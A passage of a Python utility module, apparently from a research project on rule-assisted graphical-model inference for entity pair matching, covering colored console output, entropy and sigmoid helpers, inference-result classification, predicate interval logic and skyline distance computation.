showtext_unicodelist.append(header1)\r\n showtext = ''.join(showtext_unicodelist)\r\n print(header1 + icon + ' ' + showtext + ' ' * 10 + runtime.console.color.END)\r\n else:\r\n print(header1 + icon + ' ' + showtext + ' ' * 10 + runtime.console.color.END)\r\n if content != None:\r\n if type(content) == dict:\r\n splitmark = ' '\r\n thecontent = ''\r\n for eachcontentitemname in content:\r\n contentvalue = content[eachcontentitemname]\r\n if runtime.isnumber(contentvalue) == True and contentvalue != 0 and math.isnan(contentvalue) == False:\r\n if contentvalue < 0:\r\n contentvalue = contentvalue * (-1)\r\n if contentvalue != 1:\r\n for eachspecialvalue in metainfo.top.specialvalue:\r\n specialtag = metainfo.top.specialvalue[eachspecialvalue]\r\n if contentvalue == eachspecialvalue:\r\n contentvalue = specialtag\r\n break\r\n elif math.isinf(contentvalue) == True:\r\n contentvalue = '∞'\r\n break\r\n else:\r\n variation_contentvalue = int(math.log(contentvalue, eachspecialvalue))\r\n if math.pow(eachspecialvalue, variation_contentvalue) == contentvalue:\r\n contentvalue = specialtag + ' ^ ' + str(variation_contentvalue)\r\n break\r\n if content[eachcontentitemname] < 0:\r\n contentvalue = ' — ' + str(contentvalue)\r\n str_eachcontentitemname = str(eachcontentitemname)\r\n if type(contentvalue) == bool or 'polar' == str_eachcontentitemname:\r\n if contentvalue == True:\r\n header2_True = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3_True = runtime.console.color.END + runtime.console.color.GREEN\r\n thecontent += (header2_True + str_eachcontentitemname + ':' + header3_True + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n else:\r\n header2_False = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKRED\r\n header3_False = runtime.console.color.END + runtime.console.color.RED\r\n thecontent += (header2_False + str_eachcontentitemname + ':' + header3_False + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif metainfo.top.GROUND_TRUTH == str_eachcontentitemname:\r\n header2_GT = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3_GT = runtime.console.color.END + runtime.console.color.DARKCYAN\r\n thecontent += (header2_GT + str_eachcontentitemname + ':' + header3_GT + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif 'weight' == str_eachcontentitemname:\r\n header2_GT = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKPURPLE\r\n header3_GT = runtime.console.color.END + runtime.console.color.PURPLE\r\n thecontent += (header2_GT + str_eachcontentitemname + ':' + header3_GT + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif '√' in str_eachcontentitemname:\r\n header2_True = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3_True = runtime.console.color.END + runtime.console.color.GREEN\r\n thecontent += (header2_True + str_eachcontentitemname + ':' + header3_True + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif '×' in str_eachcontentitemname:\r\n header2_False = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKRED\r\n header3_False = runtime.console.color.END + runtime.console.color.RED\r\n thecontent += (header2_False + str_eachcontentitemname + ':' + header3_False + ' ' + str(contentvalue) + 
runtime.console.color.END + splitmark)\r\n                    else:\r\n                        thecontent += (header2 + str_eachcontentitemname + ':' + header3 + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n                content = thecontent[0: len(thecontent) - len(splitmark)] + ' .'\r\n            sys.stdout.write(header3 + str(content))\r\n            print(runtime.console.color.END)\r\n            sys.stdout.flush()\r\n\r\n    @staticmethod\r\n    def print(level, style, highlightindexes, *content):\r\n        icon = None\r\n        if level == 0:\r\n            icon = runtime.console.color.BLUE + '💎 ' + runtime.console.color.END\r\n        else:\r\n            icon = '📝 '\r\n        output = runtime.console.color.END + ' ' * level + icon\r\n        for eachcontentindex in range(0, len(content)):\r\n            currentoutput = runtime.console.color.END\r\n            if highlightindexes != None and eachcontentindex in highlightindexes:\r\n                # pick the highlight color that matches the requested style\r\n                if style == runtime.console.styles.INFO:\r\n                    currentoutput = runtime.console.color.END + runtime.console.color.DARKPURPLE\r\n                elif style == runtime.console.styles.STRESS:\r\n                    currentoutput = runtime.console.color.END + runtime.console.color.YELLOW\r\n                elif style == runtime.console.styles.OUTLOOK:\r\n                    currentoutput = runtime.console.color.END + runtime.console.color.DARKCYAN\r\n                elif style == runtime.console.styles.REPORT:\r\n                    currentoutput = runtime.console.color.END + runtime.console.color.BLUE\r\n                elif style == runtime.console.styles.CORRECTION:\r\n                    currentoutput = runtime.console.color.END + runtime.console.color.DARKGREEN\r\n                elif style == runtime.console.styles.EXCEPTION:\r\n                    currentoutput = runtime.console.color.END + runtime.console.color.RED\r\n            currentoutput += (str(content[eachcontentindex]) + ' ')\r\n            output += currentoutput\r\n        output += runtime.console.color.END\r\n        print(output)\r\n\r\n    @staticmethod\r\n    def uniforminterval(intervalcount):\r\n        allintervals = []\r\n        step = float(1) / intervalcount\r\n        previousleft = None\r\n        previousright = 0\r\n        currentleft = None\r\n        currentright = None\r\n        for intervalindex in range(0, intervalcount):\r\n            interval = []\r\n            currentleft = previousright\r\n            currentright = currentleft + step\r\n            if intervalindex == intervalcount - 1:\r\n                currentright = 1 + metainfo.top.SMALL_VALUE\r\n            previousleft = currentleft\r\n            previousright = currentright\r\n            allintervals.append([currentleft, currentright])\r\n        return allintervals\r\n\r\n    @staticmethod\r\n    def entropy(probability):\r\n        # binary Shannon entropy: H(p) = -(p * log2(p) + (1 - p) * log2(1 - p))\r\n        if type(probability) == np.float64 or type(probability) == np.float32 or type(probability) == float or type(probability) == int:\r\n            if math.isinf(probability) == True:\r\n                return probability\r\n            elif probability <= 0 or probability >= 1:\r\n                return 0\r\n            else:\r\n                return 0 - (probability * math.log(probability, 2) + (1 - probability) * math.log((1 - probability), 2))\r\n        elif type(probability) == list:\r\n            entropyoflist = []\r\n            for eachprobability in probability:\r\n                entropyoflist.append(runtime.entropy(eachprobability))\r\n            return entropyoflist\r\n        else:\r\n            return None\r\n\r\n    @staticmethod\r\n    def isnan(x):\r\n        return np.isnan(x) or math.isnan(x)\r\n\r\n    @staticmethod\r\n    def probabilitypolar(probability):\r\n        if type(probability) == np.float64 or type(probability) == np.float32 or type(probability) == float or type(probability) == int:\r\n            if probability >= 0.5:\r\n                return 1\r\n            elif probability < 0.5:\r\n                return 0\r\n            elif runtime.isnan(probability) == True:\r\n                # NaN fails both comparisons above\r\n                return math.nan\r\n        else:\r\n            return None\r\n\r\n    @staticmethod\r\n    def weightresultcorrect(finalweight, inpair, tolabeljudge):\r\n        from source 
import fg\r\n ruleweight = fg.pair.inferenceresult.NOT_AVAILABLE\r\n GMLweight = None\r\n ruleresult = fg.pair.inferenceresult.NOT_AVAILABLE\r\n finalresult = None\r\n if finalweight >= 0 and inpair.truthlabel == 1 or finalweight < 0 and inpair.truthlabel == 0:\r\n finalresult = True\r\n else:\r\n finalresult = False\r\n if len(inpair.rules) > 0:\r\n ruleweight = inpair.ruleweight(detailed=tolabeljudge)\r\n if tolabeljudge == True:\r\n for eachrule in ruleweight:\r\n if inpair in eachrule.truth_correcting_correct:\r\n if finalresult == True:\r\n eachrule.actual_correcting[1][0] += 1\r\n elif finalresult == False:\r\n eachrule.actual_correcting[1][1] -= 1\r\n elif inpair in eachrule.truth_correcting_misjudge:\r\n if finalresult == True:\r\n eachrule.actual_correcting[2][0] += 1\r\n elif finalresult == False:\r\n eachrule.actual_correcting[2][1] -= 1\r\n eachrule.actual_correcting[0] = eachrule.actual_correcting[1][0] + eachrule.actual_correcting[2][1]\r\n ruleweight = sum(ruleweight.values())\r\n GMLweight = finalweight - ruleweight\r\n if ruleweight >= 0 and inpair.truthlabel == 1 or ruleweight < 0 and inpair.truthlabel == 0:\r\n ruleresult = True\r\n else:\r\n ruleresult = False\r\n else:\r\n GMLweight = finalweight\r\n GMLresult = None\r\n if GMLweight >= 0 and inpair.truthlabel == 1 or GMLweight < 0 and inpair.truthlabel == 0:\r\n GMLresult = True\r\n else:\r\n GMLresult = False\r\n inferenceresult = None\r\n if ruleresult == fg.pair.inferenceresult.NOT_AVAILABLE:\r\n if finalresult == True:\r\n inferenceresult = fg.pair.inferenceresult.GMLONLY_RIGHT\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.GMLONLY_WRONG\r\n else:\r\n if GMLresult == True and ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.BOTH_RIGHT\r\n elif GMLresult == False and ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.BOTH_WRONG\r\n elif finalresult == True:\r\n if GMLresult == False and ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.RULE_CORRECT\r\n elif GMLresult == True and ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.RULE_LEAN_MISJUDGE\r\n elif finalresult == False:\r\n if GMLresult == False and ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.RULE_LEAN_CORRECT\r\n elif GMLresult == True and ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.RULE_MISJUDGE\r\n return inferenceresult, ruleweight\r\n\r\n @staticmethod\r\n def sgmlresultcorrect(finalweight, inpair):\r\n from source import fg\r\n if inpair.ugmllabel == None:\r\n return fg.pair.inferenceresult.NOT_AVAILABLE\r\n else:\r\n finalresult = finalweight >= 0 and inpair.truthlabel == 1 or finalweight < 0 and inpair.truthlabel == 0\r\n ugmlresult = inpair.ugmllabel == inpair.truthlabel\r\n ruleresult = fg.pair.inferenceresult.NOT_AVAILABLE\r\n if len(inpair.rules) > 0:\r\n ruleweight = inpair.ruleweight(detailed=False)\r\n if ruleweight >= 0 and inpair.truthlabel == 1 or ruleweight < 0 and inpair.truthlabel == 0:\r\n ruleresult = True\r\n else:\r\n ruleresult = False\r\n inferenceresult = None\r\n if finalresult == True:\r\n if ugmlresult == True:\r\n if inpair.truthlabel == 0:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_RIGHT_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_RIGHT_1\r\n else:\r\n if inpair.truthlabel == 0:\r\n if ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_CORRECT_0\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_0\r\n 
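# note: the ruleresult == None branch and the fallback below yield the same outcome; only a definite rule verdict is distinguished here\r\n                        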
else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_0\r\n else:\r\n if ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_CORRECT_1\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_1\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_1\r\n else:\r\n if ugmlresult == True:\r\n if inpair.truthlabel == 0:\r\n if ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_MISJUDGE_0\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_0\r\n else:\r\n if ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_MISJUDGE_1\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_1\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_1\r\n else:\r\n if inpair.truthlabel == 0:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_WRONG_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_WRONG_1\r\n return inferenceresult\r\n\r\n\r\n\r\n @staticmethod\r\n def sigmoid(weight):\r\n #i.e. math.exp(weight)/(1+ math.exp(weight))\r\n #return float(1) / float(1 + math.exp((-1) * weight))\r\n return expit(weight)\r\n\r\n @staticmethod\r\n def weight2probabilityentropy(weight):\r\n probability = runtime.sigmoid(weight)\r\n entropy = runtime.entropy(probability)\r\n return weight, probability, entropy\r\n\r\n @staticmethod\r\n def sublist(thelist, theinds):\r\n sublist = []\r\n for eachind in theinds:\r\n sublist.append(thelist[eachind])\r\n return sublist\r\n\r\n @staticmethod\r\n def searchFile(searchpath, filenamepattern):\r\n def cmp_filename(a, b):\r\n if len(a) == len(b):\r\n return runtime.cmp(a, b)\r\n else:\r\n return runtime.cmp(len(a), len(b))\r\n matchedFile = []\r\n for root, dirs, files in os.walk(searchpath):\r\n for file in files:\r\n if re.match(filenamepattern, file):\r\n fname = os.path.abspath(os.path.join(root, file))\r\n matchedFile.append(fname)\r\n matchedFile.sort(key=functools.cmp_to_key(cmp_filename), reverse=False)\r\n return matchedFile\r\n\r\n class hashabledict(dict):\r\n def __key(self):\r\n return tuple((k, self[k]) for k in sorted(self))\r\n def __hash__(self):\r\n return hash(self.__key())\r\n def __eq__(self, other):\r\n return self.__key() == other.__key()\r\n\r\n class hashableset(set):\r\n def __hash__(self):\r\n return hash(frozenset(self))\r\n\r\n class hashablelist(list):\r\n def __hash__(self):\r\n return hash(frozenset(self))\r\n\r\n @staticmethod\r\n def completeset_redundant(values, polar):\r\n values = list(values)\r\n values.sort(reverse=False)\r\n if polar == 0:\r\n values = values[0: len(values) - 1]\r\n else:\r\n values = values[1: len(values)]\r\n return values\r\n\r\n @staticmethod\r\n def equaldistance_choice(thelist, choicenumber):\r\n if choicenumber == 1:\r\n return [thelist[int(len(thelist) / 2)]]\r\n else:\r\n start = 0\r\n stop = len(thelist) - 1\r\n choices = np.linspace(start, stop, num=choicenumber, endpoint=True, retstep=False, dtype=int)\r\n choicelist = list(set(np.array(thelist)[choices]))\r\n return choicelist\r\n\r\n @staticmethod\r\n def combine(form_values, all_form_values_values, polar, mutation_basepredicates, mutation):\r\n initindicator = runtime.hashabledict({str(metainfo.top.INDETERMINATE):metainfo.top.INDETERMINATE})\r\n previouscombinations = runtime.hashabledict({initindicator:all_form_values_values})\r\n combinations = 
None\r\n for eachform in form_values:\r\n combinations = runtime.hashabledict()\r\n eachformvalues = form_values[eachform]\r\n eachformvalues_completeset_redundant = runtime.completeset_redundant(eachformvalues.keys(), polar)\r\n mutation_rangevalue = None\r\n if mutation_basepredicates == None:\r\n mutation_rangevalue = [min(eachformvalues_completeset_redundant), max(eachformvalues_completeset_redundant)]\r\n else:\r\n for eachpredicate in mutation_basepredicates:\r\n if eachpredicate.feature == eachform:\r\n mutation_rangevalue = eachpredicate.mutationrange(mutation=mutation)\r\n break\r\n for eachformvalue in eachformvalues.keys():\r\n if eachformvalue >= mutation_rangevalue[0] and eachformvalue <= mutation_rangevalue[1]:\r\n if eachformvalue in eachformvalues_completeset_redundant:\r\n eachformvalue_values = set()\r\n if polar == 0:\r\n for polaroperation_eachformvalue in eachformvalues:\r\n if polaroperation_eachformvalue <= eachformvalue:\r\n eachformvalue_values.update(eachformvalues[polaroperation_eachformvalue])\r\n else:\r\n for polaroperation_eachformvalue in eachformvalues:\r\n if polaroperation_eachformvalue >= eachformvalue:\r\n eachformvalue_values.update(eachformvalues[polaroperation_eachformvalue])\r\n for eachpreviouscombination in previouscombinations:\r\n eachextendcombination = runtime.hashabledict(eachpreviouscombination)\r\n eachextendcombination[eachform] = eachformvalue\r\n eachextendformvalue_values = set(previouscombinations[eachpreviouscombination]).intersection(eachformvalue_values)\r\n combinations[eachextendcombination] = eachextendformvalue_values\r\n else:\r\n for eachpreviouscombination in previouscombinations:\r\n eachextendcombination = runtime.hashabledict(eachpreviouscombination)\r\n eachextendformvalue_values = set(previouscombinations[eachpreviouscombination])\r\n combinations[eachextendcombination] = eachextendformvalue_values\r\n previouscombinations = combinations\r\n copycombinations = runtime.hashabledict(combinations)\r\n combinations = runtime.hashabledict()\r\n for eachcombination in copycombinations:\r\n thepairs = copycombinations[eachcombination]\r\n del eachcombination[str(metainfo.top.INDETERMINATE)]\r\n if len(eachcombination) > 0:\r\n combinations[eachcombination] = thepairs\r\n combinations_predicates = {}\r\n op = None\r\n if polar == 0:\r\n op = runtime.predicate.op.lesseq\r\n else:\r\n op = runtime.predicate.op.largereq\r\n for eachcombination in combinations:\r\n current_combinations_predicates = runtime.hashableset()\r\n for eachfeature in eachcombination:\r\n eachfeaturevalue = eachcombination[eachfeature]\r\n current_combinations_predicates.add(runtime.predicate(feature=eachfeature, op=op, value=eachfeaturevalue, valueex=None))\r\n combinations_predicates[current_combinations_predicates] = combinations[eachcombination]\r\n return combinations_predicates\r\n\r\n class predicate:\r\n\r\n class op:\r\n lesseq = '≤'\r\n largereq = '≥'\r\n eq = '='\r\n oppose = {lesseq:largereq, largereq:lesseq}\r\n\r\n def __init__(self, feature, op, value, valueex = None):\r\n self.feature = feature\r\n self.op = op\r\n self.value = value\r\n self.valueex = valueex\r\n if self.value == None:\r\n self.value = self.valueex\r\n self.valueex = None\r\n if self.valueex != None:\r\n if self.value == self.valueex:\r\n self.op = runtime.predicate.op.eq\r\n self.valueex = None\r\n else:\r\n if self.op == runtime.predicate.op.largereq:\r\n self.value = max(value, valueex)\r\n self.valueex = min(value, valueex)\r\n else:\r\n self.value = min(value, 
valueex)\r\n self.valueex = max(value, valueex)\r\n if runtime.isnumber(self.value):\r\n self.value = float(self.value)\r\n if runtime.isnumber(self.valueex):\r\n self.valueex = float(self.valueex)\r\n assert(self.value != metainfo.top.NONE_VALUE and self.valueex != metainfo.top.NONE_VALUE)\r\n\r\n def print(self):\r\n if self.valueex == None:\r\n description = str(self.feature) + ' ' + str(self.op) + ' ' + str(runtime.round(self.value))\r\n else:\r\n description = str(runtime.round(self.value)) + ' ' + str(self.op) + ' ' + str(self.feature) + ' ' + str(self.op) + ' ' + str(runtime.round(self.valueex))\r\n return description\r\n\r\n def singlebound(self, op):\r\n if self.valueex == None:\r\n return\r\n else:\r\n assert(op == runtime.predicate.op.lesseq or op == runtime.predicate.op.largereq)\r\n if self.op in runtime.predicate.op.lesseq:\r\n if op == runtime.predicate.op.lesseq:\r\n self.value = self.valueex\r\n self.valueex = None\r\n else:\r\n self.op = runtime.predicate.op.oppose[self.op]\r\n self.valueex = None\r\n else:\r\n if op == runtime.predicate.op.largereq:\r\n self.value = self.valueex\r\n self.valueex = None\r\n else:\r\n self.op = runtime.predicate.op.oppose[self.op]\r\n self.valueex = None\r\n\r\n def isconform(self, featurevalue):\r\n # __init__ requires assert(self.value != metainfo.top.NONE_VALUE and self.valueex != metainfo.top.NONE_VALUE)\r\n if featurevalue == metainfo.top.NONE_VALUE:\r\n return False\r\n if self.valueex == None:\r\n if self.op == runtime.predicate.op.eq:\r\n return featurevalue == self.value\r\n elif self.op == runtime.predicate.op.lesseq:\r\n return featurevalue <= self.value\r\n elif self.op == runtime.predicate.op.largereq:\r\n return featurevalue >= self.value\r\n else:\r\n if self.op == runtime.predicate.op.lesseq:\r\n return self.value <= featurevalue and featurevalue <= self.valueex\r\n elif self.op == runtime.predicate.op.largereq:\r\n return self.value >= featurevalue and featurevalue >= self.valueex\r\n\r\n @staticmethod\r\n def combine(predicates_list):\r\n refer_features = {}\r\n for each_predicates in predicates_list:\r\n feature = each_predicates.feature\r\n op = each_predicates.op\r\n value = each_predicates.value\r\n valueex = each_predicates.valueex\r\n if feature not in refer_features:\r\n refer_features[feature] = [None, None]\r\n bound = refer_features[feature]\r\n if op == runtime.predicate.op.eq:\r\n if bound[0] == None or bound[0] <= value:\r\n bound[0] = value\r\n if bound[1] == None or bound[1] >= value:\r\n bound[1] = value\r\n else:\r\n if op == runtime.predicate.op.largereq:\r\n if valueex != None:\r\n if bound[0] == None or bound[0] <= valueex:\r\n bound[0] = valueex\r\n if bound[1] == None or bound[1] >= value:\r\n bound[1] = value\r\n else:\r\n if bound[0] == None or bound[0] <= value:\r\n bound[0] = value\r\n else:\r\n if valueex != None:\r\n if bound[0] == None or bound[0] <= value:\r\n bound[0] = value\r\n if bound[1] == None or bound[1] >= valueex:\r\n bound[1] = valueex\r\n else:\r\n if bound[1] == None or bound[1] >= value:\r\n bound[1] = value\r\n predicates_list = []\r\n for each_feature in refer_features:\r\n newpredicate = None\r\n bound = refer_features[each_feature]\r\n if bound[0] != None and bound[1] != None:\r\n if bound[0] < bound[1]:\r\n if op == runtime.predicate.op.lesseq:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.lesseq, bound[0], bound[1])\r\n else:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.largereq, bound[1], bound[0])\r\n 
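# 'op' still carries the (presumably shared) direction of the input predicates from the loop above; the fresh interval predicate is reduced back to the single bound relevant for that direction\r\n                    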
newpredicate.singlebound(op)\r\n elif bound[0] == bound[1]:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.eq, bound[0], None)\r\n else:\r\n return None\r\n elif bound[0] != None and bound[1] == None:\r\n if op == runtime.predicate.op.largereq:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.largereq, bound[0], None)\r\n newpredicate.singlebound(runtime.predicate.op.largereq)\r\n elif bound[0] == None and bound[1] != None:\r\n if op == runtime.predicate.op.lesseq:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.lesseq, bound[1], None)\r\n newpredicate.singlebound(runtime.predicate.op.lesseq)\r\n if newpredicate == None:\r\n predicates_list = None\r\n break\r\n predicates_list.append(newpredicate)\r\n return predicates_list\r\n\r\n @staticmethod\r\n def issmallerthan(predicates_1, predicates_2):\r\n features_1 = set([eachpredicate.feature for eachpredicate in predicates_1])\r\n features_2 = set([eachpredicate.feature for eachpredicate in predicates_2])\r\n if len(features_1.intersection(features_2)) == len(features_2):\r\n predicates_12 = list(predicates_1) + list(predicates_2)\r\n predicates = runtime.predicate.combine(predicates_12)\r\n if predicates != None and set(predicates) == set(predicates_1):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n def mutationrange(self, mutation):\r\n thebounds = None\r\n if self.valueex != None:\r\n thebounds = [min(self.value, self.valueex), max(self.value, self.valueex)]\r\n if mutation != None:\r\n thebounds = [thebounds[0] - mutation[0], thebounds[1] + mutation[1]]\r\n elif mutation == None:\r\n thebounds = [self.value, self.value]\r\n else:\r\n thebounds = [self.value - mutation[0], self.value + mutation[1]]\r\n return thebounds\r\n\r\n\r\n def __eq__(self, another):\r\n if type(self) == type(another) and self.feature == another.feature and self.op == another.op and self.value == another.value and self.valueex == another.valueex:\r\n return True\r\n else:\r\n return False\r\n\r\n def __hash__(self):\r\n return hash(self.print())\r\n\r\n class skyline:\r\n\r\n @staticmethod\r\n def nonevalueprocess(local_conform_map, diff_metafeature_indexes, polar, monotone_nonevalue_transformer):\r\n needprocess_notallsame = []\r\n for eachfeatureindex in range(0, local_conform_map.shape[1]):\r\n itemset = list(set(local_conform_map[:, eachfeatureindex]))\r\n if len(itemset) == 1 and (runtime.isnan(itemset[0])):\r\n needprocess_notallsame.append(eachfeatureindex)\r\n # SIM: NONE_VALUE = Not relevant is safety.\r\n # DIFF for polar 0: != NONE_VALUE safety, for polar 1: != NONE_VALUE is skyline to verify to polar 0 rule, i.e. 
= NONE_VALUE is safety.\r\n # WaiCmp uses all unknown values in pair as NONE_VALUE, therefore can be trusted as safety.\r\n for eachindex in range(0, local_conform_map.shape[1]):\r\n npwhere_NONE_VALUE = np.where(local_conform_map[:, eachindex] == metainfo.top.NONE_VALUE)[0].tolist()\r\n npwhere_NONE_VALUE = [npwhere_NONE_VALUE, eachindex]\r\n if polar == 0:\r\n if eachindex not in diff_metafeature_indexes:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].min # no sim: safety\r\n else:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].min # no diff: skyline or always safety.\r\n else:\r\n if eachindex not in diff_metafeature_indexes:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].max # no sim: safety\r\n else:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].max # no diff: safety\r\n\r\n @staticmethod\r\n def isinside(base, aim, polar):\r\n if polar == 0:\r\n return np.all(aim <= base)\r\n else:\r\n return np.all(aim >= base)\r\n\r\n @staticmethod\r\n def distance(q, skylines, smallerprefer, w):\r\n def cost(q, p, w):\r\n return np.dot(w, np.fabs(q - p))\r\n def SP(q, SKY):\r\n dim = SKY.shape[1]\r\n m = SKY.shape[0]\r\n P = set()\r\n if dim == 1:\r\n for i in range(1, m + 1):\r\n P.add(runtime.hashablelist(SKY[i - 1, :]))\r\n elif dim == 2:\r\n # sort points in SKY in the ascending order on dimension D1;\r\n sortindexes = np.argsort(SKY[:, 0])\r\n s = [None] * (m + 1)\r\n for i in range(1, m + 1):\r\n s[i] = SKY[sortindexes[i - 1], :]\r\n for i in range(1, m + 2):\r\n if i == 1:\r\n P.add(runtime.hashablelist([q[0], s[1][1]]))\r\n elif i == m + 1:\r\n P.add(runtime.hashablelist([s[m][0], q[1]]))\r\n else:\r\n P.add(runtime.hashablelist([s[i - 1][0], s[i][1]]))\r\n else:\r\n diversityvalues = [None] * dim\r\n diversityvalues_len = [None] * dim\r\n for eachdim in range(0, dim):\r\n diversityvalues[eachdim] = list(set(SKY[:, eachdim]))\r\n diversityvalues_len[eachdim] = len(diversityvalues[eachdim])\r\n k = np.argmin(diversityvalues_len)\r\n diversityvalues[k].sort(reverse=True)\r\n l = diversityvalues_len[k]\r\n S = [None] * (l + 2)\r\n Sk_value = [None] * (l + 2)\r\n SKY_k = SKY[:, k]\r\n for i in range(1, l + 1):\r\n Sk_value[i] = diversityvalues[k][i - 1]\r\n _Si = SKY[np.where(SKY_k == Sk_value[i])]\r\n S[i] = set()\r\n _Si.tolist()\r\n for each in _Si:\r\n S[i].add(runtime.hashablelist(each))\r\n S[l + 1] = set()\r\n S_lp1_specialcase = runtime.hashablelist(q)\r\n S[l + 1].add(S_lp1_specialcase)\r\n Sk_value[l + 1] = S_lp1_specialcase[k]\r\n Pi = [None] * (l + 2)\r\n projectindexes = list(range(0, dim))\r\n projectindexes.remove(k)\r\n p = q[projectindexes]\r\n Pi[1] = set()\r\n Pi[1].add(runtime.hashablelist(p))\r\n P = set()\r\n P_adding = []\r\n for eachpp in Pi[1]:\r\n P_adding.append(eachpp)\r\n recover_k = [Sk_value[1]] * len(P_adding)\r\n P_adding = np.insert(P_adding, k, recover_k, axis=1)\r\n for eachadding in P_adding:\r\n P.add(runtime.hashablelist(eachadding))\r\n proj_q = q[projectindexes]\r\n SS = set()\r\n for i in range(2, l + 2):\r\n SS.update(S[i - 1])\r\n _SS = np.array(list(SS), ndmin=2)\r\n df = pd.DataFrame(_SS, columns=list(range(dim)))\r\n mask = paretoset(df, sense=['max'] * dim, distinct=True, use_numba=True)\r\n SS = set()\r\n for eachmaskindex in range(0, len(mask)):\r\n if mask[eachmaskindex] == 1:\r\n SS.add(runtime.hashablelist(_SS[eachmaskindex, :]))\r\n proj_SS= np.array(_SS)[:, 
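# project away the pivot dimension k before recursing: SP() then finds candidate nearest points on the reduced skyline\r\n                    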
projectindexes]\r\n Pi[i] = SP(proj_q, proj_SS)\r\n P_adding = []\r\n for eachpp in Pi[i - 1]:\r\n # larger i smaller Si[k], distance cost prefers smaller and local optimal points are not dominated as Margins.\r\n if eachpp not in Pi[i]:\r\n P_adding.append(eachpp)\r\n # Not in condition, not always not empty.\r\n if len(P_adding) > 0:\r\n recover_k = [Sk_value[i]] * len(P_adding)\r\n P_adding = np.insert(P_adding, k, recover_k, axis=1)\r\n for each in P_adding:\r\n P.add(runtime.hashablelist(each))\r\n return P\r\n if skylines.shape[0] == 0:\r\n return 0\r\n else:\r\n skylines = np.unique(skylines, axis=0)\r\n q = np.array(q)\r\n if smallerprefer == True:\r\n q = q * (-1)\r\n skylines = skylines * (-1)\r\n qp = SP(q=q, SKY=skylines)\r\n mincost = math.inf\r\n for eachqp in qp:\r\n eachqp = np.array(eachqp)\r\n thiscost = cost(q, eachqp, w)\r\n if thiscost < mincost:\r\n mincost = thiscost\r\n return mincost\r\n\r\n class indexes_transformer:\r\n\r\n def __init__(self, sub_indexes):\r\n self.subindexes = []\r\n for each_sub_index in sub_indexes:\r\n self.subindexes.append(np.array(each_sub_index))\r\n\r\n def fullindexes(self, subindexes):\r\n fullindexes = []\r\n for eachsubindex_index in range(0, len(subindexes)):\r\n fullindexes.append(self.subindexes[eachsubindex_index][subindexes[eachsubindex_index]])\r\n return fullindexes\r\n\r\n @staticmethod\r\n def combine(indexes_lists):\r\n thecombine = []\r\n for each_axis_index in range(0, len(indexes_lists[0])):\r\n thecombine.append([])\r\n for each_index_list in indexes_lists:\r\n for each_axis_index in range(0, len(each_index_list)):\r\n thecombine[each_axis_index] += list(each_index_list[each_axis_index])\r\n return thecombine\r\n\r\n op_index_colon = slice(None)\r\n type_None = type(None)\r\n\r\n @staticmethod\r\n def isNone(object):\r\n if object is None:\r\n return True\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n def isArrayEmpty(array):\r\n return np.array(array).size == 0\r\n\r\n class forest:\r\n\r\n def __init__(self, balance, mainmap_knowledgeupdating, labelindex, splitters, polar, weight, probability, confidence_coefficient, premilinary_condition_predicates, nondirectional_map = None, conform_map = None, roottrees = None):\r\n # map columns: [ UNITFEATURE TABLES, GML LABEL, PROBE LABEL ] ~ [ features (specified splitters range), labels (specified map index, to indicate both labels and Unlabeled) ]\r\n # main map for knowledge updating\r\n self.balance = balance\r\n self.map = np.array(mainmap_knowledgeupdating)\r\n self.labelindex = labelindex\r\n self.splitters = splitters\r\n self.splitter_count = len(self.splitters)\r\n self.polar = 